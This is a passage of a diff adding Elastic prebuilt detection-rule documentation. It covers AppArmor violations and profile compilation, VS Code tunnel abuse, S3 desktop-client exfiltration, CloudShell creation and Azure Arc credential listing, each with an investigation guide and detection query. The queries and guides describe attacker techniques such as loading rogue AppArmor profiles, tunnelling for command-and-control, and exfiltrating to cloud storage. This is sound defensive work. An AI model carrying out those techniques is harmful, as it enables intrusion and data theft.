+> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AppArmor Policy Violation Detected* + + +This alert shows that AppArmor blocked or limited a Linux process because it tried to act outside its assigned security profile, which can reveal privilege escalation, restricted file access, or defense-evasion activity being stopped by the kernel. An attacker who gains code execution in a web-facing service might try to read `/etc/shadow`, spawn a shell from the confined process, or touch protected sockets, causing this violation when AppArmor contains the behavior. + + +*Possible investigation steps* + + +- Determine which AppArmor profile produced the denial and what resource or capability was blocked, then judge whether the attempted action matches the application's expected behavior or suggests shell execution, credential access, or unusual network activity. +- Build a short timeline around the event for the affected workload to identify preceding parent-child process chains, interactive sessions, failed access attempts, new persistence artifacts, or outbound connections that indicate exploitation rather than misconfiguration. +- Review recent software deployments, package updates, profile changes, and administrator actions on the host to verify whether the violation began after a legitimate change that may require profile tuning or rollback. +- If the denied behavior is unexpected or repeated, validate the integrity and reputation of the involved binary or script against known-good versions from the environment and inspect its execution context for signs of tampering or abuse. +- For violations that align with malicious behavior, preserve relevant audit and system logs, contain the host or impacted service as needed, remove any confirmed malicious artifacts, and retain or harden the AppArmor policy that successfully blocked the action. + + +*False positive analysis* + + +- A legitimate application or package update may change binaries, file paths, or socket usage without a matching AppArmor profile update, so verify the alert timing against recent host software changes and confirm the denied path or capability is part of the application's documented normal operation. +- An administrator-initiated maintenance task or service restart can trigger a confined process to access temporary files, logs, or helper executables outside its usual profile, so review the parent process, command line, and user context to confirm it aligns with expected maintenance activity on the host. + + +*Response and remediation* + + +- Isolate the affected Linux host or container from the network, stop the compromised service or process that triggered the AppArmor denial, and disable any abused user or service account to prevent additional attacker execution. +- Remove attacker footholds by deleting unauthorized systemd units, cron jobs, startup scripts, SSH `authorized_keys` additions, dropped web shells, or replaced binaries linked to the confined process, then terminate any related child shells or reverse-connection tools. +- Restore the workload to a known-good state by rebuilding the host or redeploying the service from a trusted image, reinstalling affected packages, validating critical files such as `/etc/passwd`, `/etc/shadow`, and application binaries against baseline hashes, and rotating any credentials the process may have reached. +- Escalate to incident response immediately if the denial came from an internet-facing service, involved attempts to spawn a shell or read protected files, showed tampering with `/etc/apparmor.d/`, or appeared on multiple hosts, because these are strong indicators of active exploitation or wider compromise. +- Harden the environment by keeping AppArmor in enforce mode, restoring any modified profiles, patching the vulnerable application or package the attacker abused, removing unnecessary interpreter access and write permissions for the service, and adding detections for the same blocked shell, file, or socket behaviors across similar systems. + +==== Setup + + + +*Setup* + + +This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. +``` +Kibana --> +Management --> +Integrations --> +Auditd Manager --> +Add Auditd Manager +``` +`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. + +For this detection rule no additional audit rules are required to be added to the integration. + +Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "change" and event.action == "violated-apparmor-policy" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc new file mode 100644 index 0000000000..4537b3eb56 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc @@ -0,0 +1,160 @@ +[[prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser]] +=== AppArmor Profile Compilation via apparmor_parser + +Detects the execution of "apparmor_parser" using the "-o" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use "apparmor_parser" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* endgame-* +* logs-crowdstrike.fdr* +* logs-sentinel_one_cloud_funnel.* +* logs-auditd_manager.auditd-* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt +* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Auditd Manager +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AppArmor Profile Compilation via apparmor_parser* + + +This alert flags a Linux process using apparmor_parser to write a compiled AppArmor policy to disk, an action administrators and package scripts use but adversaries can abuse to stage policy changes. An attacker with root access can compile a custom profile that grants a trojanized service broader file or capability access, then load it to weaken confinement and support privilege escalation or stealthy persistence. + + +*Possible investigation steps* + + +- Review the full command line, parent and ancestor process chain, executing user, tty or session, and working directory to determine whether the activity came from expected package management or configuration tooling versus an interactive shell. +- Identify the source profile and output file paths, then inspect the profile for broad file access, dangerous capability grants, unconfined transitions, or complain/disable settings that would weaken confinement for sensitive binaries or services. +- Correlate nearby events for writes under AppArmor policy directories, subsequent policy loads or reloads, package installation actions, and restarts of the targeted application to confirm whether the compiled profile was actually deployed. +- Compare the activity against host and peer-system baselines and validate it with change records, deployment jobs, or package updates tied to the same account or system to quickly distinguish administrative maintenance from anomalous behavior. +- If the execution is not authorized, preserve the generated profile and related scripts, restore affected policy files from a known-good source, and review recent privileged activity on the host for additional persistence or defense-evasion changes. + + +*False positive analysis* + + +- Operating system package installation or upgrade can invoke apparmor_parser with -o to precompile a vendor profile during a post-install action; verify this by reviewing the parent process and nearby package-management activity for an authorized update at the same time. +- A system administrator may compile a new or modified local AppArmor profile while hardening or troubleshooting a service; verify the executing user, source and output file paths, and whether the change aligns with approved maintenance or documented policy updates. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network and stop any service whose confinement was altered if the compiled profile was loaded or written into `/etc/apparmor.d/` or AppArmor cache directories, to prevent further policy abuse. +- Preserve the malicious source profile, compiled output, invoking script, and shell history for evidence, then delete unauthorized files from `/etc/apparmor.d/`, `/etc/apparmor.d/disable/`, and cache paths and unload the rogue policy with approved AppArmor administration commands. +- Remove attacker persistence by reviewing and cleaning systemd unit files, timers, cron entries, package maintainer scripts, login startup files, and sudoers changes that call `apparmor_parser` or restore the profile at boot. +- Reset or revoke credentials used on the host, including root and sudo-capable accounts, service account secrets, and unauthorized `authorized_keys`, if the attacker had interactive access or modified privileged services. +- Restore AppArmor policy files, affected binaries, and related service configurations from trusted packages, configuration management, or a gold image, then reload AppArmor in enforce mode and confirm the targeted program is confined by the expected profile. +- Escalate to incident response immediately if the custom profile targeted `sshd`, `sudo`, container runtimes, web-facing daemons, or appears on multiple hosts, and harden the environment by limiting write access to AppArmor policy paths, alerting on future `apparmor_parser -o` use outside approved package activity, and enforcing change control for policy updates. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "apparmor_parser" and process.args in ("--ofile*", "-o*", "--output*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc new file mode 100644 index 0000000000..e05c6024b7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel]] +=== Attempt to Establish VScode Remote Tunnel + +Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://badoption.eu/blog/2023/01/31/code_c2.html +* https://code.visualstudio.com/docs/remote/tunnels + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Windows Security Event Logs +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Establish VScode Remote Tunnel* + + +Visual Studio Code (VScode) offers a remote tunnel feature enabling developers to connect to remote environments seamlessly. While beneficial for legitimate remote development, adversaries can exploit this to establish unauthorized access or control over systems. The detection rule identifies suspicious use of VScode's tunnel command, focusing on specific command-line arguments and process behaviors, to flag potential misuse indicative of command and control activities. + + +*Possible investigation steps* + + +- Review the process details to confirm the presence of the "tunnel" argument in the command line, which indicates an attempt to establish a remote tunnel session. +- Check the parent process name to ensure it is not "Code.exe" when the process name is "code-tunnel.exe" with the "status" argument, as this is an exception in the rule. +- Investigate the origin of the process by examining the user account and machine from which the process was initiated to determine if it aligns with expected usage patterns. +- Analyze network logs to identify any unusual or unauthorized connections to GitHub or remote VScode instances that may suggest malicious activity. +- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Sysmon, or Microsoft Defender for Endpoint to gather additional context on the activity. +- Assess the risk and impact by determining if the system or user account has been involved in previous suspicious activities or if there are any indicators of compromise. + + +*False positive analysis* + + +- Legitimate remote development activities using VScode's tunnel feature may trigger the rule. Users can create exceptions for known developer machines or specific user accounts frequently using this feature for authorized purposes. +- Automated scripts or deployment tools that utilize VScode's remote tunnel for legitimate operations might be flagged. Consider excluding these processes by identifying their unique command-line arguments or parent processes. +- Scheduled tasks or system maintenance activities that involve VScode's remote capabilities could be misidentified as threats. Review and whitelist these tasks by their specific execution times or associated service accounts. +- Development environments that frequently update or test VScode extensions might inadvertently match the rule's criteria. Exclude these environments by setting up exceptions based on their network segments or IP addresses. +- Training or demonstration sessions using VScode's remote features for educational purposes can be mistaken for suspicious activity. Implement exclusions for these sessions by tagging them with specific event identifiers or user roles. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration. +- Terminate any suspicious VScode processes identified by the detection rule to halt potential command and control activities. +- Conduct a thorough review of system logs and process histories to identify any additional indicators of compromise or lateral movement attempts. +- Reset credentials and access tokens associated with the affected system and any connected services to mitigate unauthorized access. +- Restore the system from a known good backup if any unauthorized changes or malware are detected. +- Implement network segmentation to limit the ability of similar threats to spread across the environment. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.args : "tunnel" and + (process.args : "--accept-server-license-terms" or + process.name : "code*.exe" or + ?process.code_signature.subject_name : "Microsoft Corporation" or + process.executable : ("?:\\ProgramData\\*", "?:\\Users\\Public\\*", "?:\\windows\\debug\\*", + "\\Device\\HarddiskVolume*\\Users\\Public\\*", "\\Device\\HarddiskVolume*\\ProgramData\\*", "\\Device\\HarddiskVolume*\\windows\\debug\\*")) and + not (process.name == "code-tunnel.exe" and process.args == "status" and process.parent.name == "Code.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc new file mode 100644 index 0000000000..345d8d5f7c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user]] +=== AWS API Activity from Uncommon S3 Client by Rare User + +Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://s3browser.com/ +* https://cyberduck.io/ +* https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud +* https://attackevals.github.io/ael/enterprise/scattered_spider/emulation_plan/scattered_spider_scenario/ + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS CloudTrail +* Data Source: AWS S3 +* Tactic: Exfiltration +* Use Case: Threat Detection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating AWS API Activity from Uncommon S3 Client by Rare User* + + +S3 Browser and Cyberduck are graphical clients for Amazon S3 that allow users to browse, upload, download, and manage S3 objects. While legitimate tools, they are uncommonly used in enterprise environments where organizations typically standardize on AWS CLI, SDKs, or console access. The presence of these tools may indicate unauthorized data access or exfiltration activity. + +This is a https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule[New Terms] rule that identifies the first time a specific user within an account makes API calls using S3 Browser or Cyberduck user agent strings. Threat actors have been observed using these tools for their intuitive interface and bulk data transfer capabilities during post-compromise data theft operations. + + +*Possible investigation steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which IAM principal was used. + - Check whether this principal normally accesses S3 and whether usage of these desktop clients is expected or authorized. + +- **Review accessed resources** + - Examine `aws.cloudtrail.resources.arn` to identify which S3 buckets and objects were accessed. + - Determine whether the accessed data is sensitive, confidential, or subject to data protection policies. + - Look for patterns indicating bulk downloads or systematic enumeration of bucket contents. + +- **Analyze the actions performed** + - Review `event.action` to understand what operations were performed (e.g., `GetObject`, `ListBucket`, `PutObject`). + - High volumes of `GetObject` calls may indicate data exfiltration. + - `PutObject` calls to external buckets could indicate data staging for exfiltration. + +- **Inspect source network context** + - Review `source.ip` and `source.geo` fields to determine the origin of the request. + - Check whether the IP belongs to corporate infrastructure, VPN, or an unexpected external location. + - External IPs combined with these desktop client tools are high-risk indicators. + +- **Correlate with surrounding activity** + - Search for additional CloudTrail events from the same access key or session. + - Look for preceding credential theft indicators such as `GetSecretValue`, `CreateAccessKey`, or console logins. + - Check for cross-account transfers or `CreateBucket` calls in external accounts. + + +*False positive analysis* + + +- **Authorized data migration or backup activities** may use these tools. Confirm with data engineering or IT teams. +- **Developer testing** in non-production environments may occasionally involve these clients. Validate the environment and data sensitivity. +- **Third-party integrations** using Cyberduck libraries may generate this user agent. Verify the automation context. + + +*Response and remediation* + + +- **If unauthorized**, immediately revoke or rotate the affected access keys and invalidate active sessions. +- **Assess data exposure** by reviewing which objects were accessed and determining if sensitive data was compromised. +- **Notify security operations** and initiate incident response procedures if exfiltration is confirmed. +- **Implement preventive controls** such as S3 bucket policies restricting access by user agent or requiring VPC endpoints. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "aws.cloudtrail" + and user_agent.original: (*S3 Browser* or *Cyberduck*) + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Sub-technique: +** Name: Exfiltration to Cloud Storage +** ID: T1567.002 +** Reference URL: https://attack.mitre.org/techniques/T1567/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc new file mode 100644 index 0000000000..b544a5e3c3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-19-18-aws-cloudshell-environment-created]] +=== AWS CloudShell Environment Created + +Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://aws-samples.github.io/threat-technique-catalog-for-aws/Techniques/T1059.009.html +* https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS CloudTrail +* Data Source: AWS CloudShell +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS CloudShell Environment Created* + + +AWS CloudShell is a browser-based shell environment that provides instant command-line access to AWS resources without requiring local CLI installation or credential configuration. While this is convenient for legitimate administrators, it also provides adversaries with a powerful tool if they gain access to a compromised AWS console session. + +This rule detects when a CloudShell environment is created via the `CreateEnvironment` API. This event occurs when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region (each region maintains a separate environment). + + +*Possible investigation steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn` or `user.name` to determine which IAM principal created the CloudShell environment. + - Check `aws.cloudtrail.user_identity.type` to identify whether this is an IAM user or an assumed role session. + - Verify if this user typically performs command-line or administrative operations. + +- **Analyze the source context** + - Review `source.ip` and `source.geo` fields to verify the request origin matches expected administrator locations. + - Check `user_agent.original` to confirm the request came from a browser session. + - Look for the preceding `ConsoleLogin` event to understand how the session was established. + +- **Correlate with surrounding activity** + - Look for any IAM operations (CreateAccessKey, CreateUser, AttachRolePolicy) that occurred after CloudShell was accessed. + - Check for data exfiltration patterns or reconnaissance activity from the same session. + +- **Assess the broader context** + - Determine if this user has a legitimate need for CloudShell access based on their role. + - Review recent access patterns for the console session that initiated CloudShell. + - Check if MFA was used for the console login. + + +*False positive analysis* + + +- Administrators routinely using CloudShell for AWS management tasks will trigger this rule. Consider tuning for known admin users if noise is a concern. +- Users accessing CloudShell in a new AWS region will generate a `CreateEnvironment` event even if they have used CloudShell before in other regions. +- Training or certification activities may involve CloudShell environment creation. + + +*Response and remediation* + + +- If unauthorized, immediately terminate the console session to revoke CloudShell access. +- Review and revoke any credentials or resources created during the CloudShell session. +- Consider restricting CloudShell access via SCPs or IAM policies for sensitive accounts or users who do not require it. +- Implement session duration limits to reduce the window of opportunity for console session abuse. +- Enable MFA for all console logins to reduce the risk of session compromise. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "aws.cloudtrail" + and event.provider: "cloudshell.amazonaws.com" + and event.action: "CreateEnvironment" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Cloud API +** ID: T1059.009 +** Reference URL: https://attack.mitre.org/techniques/T1059/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc new file mode 100644 index 0000000000..f07914a2d4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source]] +=== Azure Arc Cluster Credential Access by Identity from Unusual Source + +Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect +* https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy +* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence +* https://nvd.nist.gov/vuln/detail/cve-2022-37968 + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Azure Arc +* Data Source: Azure Activity Logs +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Arc Cluster Credential Access by Identity from Unusual Source* + + +The `listClusterUserCredential` operation on an Azure Arc-connected cluster returns credentials that allow the caller +to establish a proxy tunnel via `az connectedk8s proxy`. This proxy routes kubectl commands through the Azure ARM API, +enabling Kubernetes access without direct network connectivity to the cluster API server. + + +*Possible investigation steps* + + +- Identify the caller service principal using `azure.activitylogs.identity.claims.appid` and cross-reference with + Azure AD to determine if this is a known application. +- Check the source IP and geolocation — is this from a country or ASN where your organization operates? +- Correlate with Azure Sign-In Logs around the same time to see the full authentication chain (SP login followed by + credential listing). +- Verify the Azure role used — the `Azure Arc Enabled Kubernetes Cluster User Role` is required for this operation. + Was this role recently assigned? +- Check if subsequent Arc-proxied operations (secret/configmap CRUD) occurred after the credential access. +- Review the service principal creation date in Azure AD — recently created SPs are more suspicious. + + +*Response and remediation* + + +- If the source IP is from an unexpected country or the service principal is not recognized, treat as potential + credential compromise. +- Revoke the service principal credentials and remove Arc RBAC role assignments. +- Review Kubernetes audit logs for any operations performed through the Arc proxy after credential access. +- Rotate any Kubernetes secrets that may have been accessed. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" + and azure.activitylogs.operation_name: "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION" + and event.outcome: (Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc 